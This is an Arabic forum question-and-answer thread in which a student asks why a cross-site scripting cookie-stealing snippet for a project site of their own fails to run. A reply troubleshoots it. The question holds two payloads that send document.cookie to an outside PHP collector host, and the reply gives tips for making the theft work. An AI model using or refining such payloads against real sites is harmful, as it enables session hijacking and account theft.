اذهب إلى المحتوى
  • 0

مساعدة في معرفة الخطأ في الكود

_Mehdi

السؤال

السلام عليكم 

احتاج تنفيذ هذا الكود في مشروعي وهو cross site scripting attack لموقع من تصميمي 

        

<body  >
<script>
function getCookies() {
document.location= " http://java.comlu.com/it/xss.php?index=" + document.cookie;
 
}
</script>
  
<img src="1.jpg"  onmouseover=' getCookies()' width"300px" height="100px"/>
</body>

او الكود الاخر

 <img src="1.jpg" width"300px" height="100px"onClick='document.location= " http://localhost:84/XSS/cookies.php?index=" + document.cookie'/>


ارجو المساعدة  لم يبقى لي سوى وقت قليل جدا جدا لتسليم المشروع ولكن الكود لاينفذ
 

تم التعديل في بواسطة java
اخطاء املائية
رابط هذا التعليق
شارك على الشبكات الإجتماعية

Recommended Posts

  • 1

السلام عليكم،

تأكد من أنك بداية لا تستخدم أي إضافة أو مكافح فيروسات قد يمنع تنفيذ شفرات XSS كنوع من الحماية (مثل NoScript وسواها).

الرابط الخاص بموقعك لا يعمل، يبدو أن الاستضافة قامت بحظره أو إزالته.

قم أيضًا بوضع قيمة للـ cookie في المستند قبل محاولة سرقتها.. الصفحة بشكل افتراضي لا تملك أي cookie فمن الطبيعي ألا تحصل على أي قيمة :)

لا تنس الاطلاع أيضًا على جوابي في سؤالك السابق حول الاستغلال بدون استخدام document.location

 

تم التعديل في بواسطة Shadi Habbal
رابط هذا التعليق
شارك على الشبكات الإجتماعية

انضم إلى النقاش

يمكنك أن تنشر الآن وتسجل لاحقًا. إذا كان لديك حساب، فسجل الدخول الآن لتنشر باسم حسابك.

زائر
أجب على هذا السؤال...

×   لقد أضفت محتوى بخط أو تنسيق مختلف.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   جرى استعادة المحتوى السابق..   امسح المحرر

×   You cannot paste images directly. Upload or insert images from URL.

  • إعلانات

  • تابعنا على



×
×
  • أضف...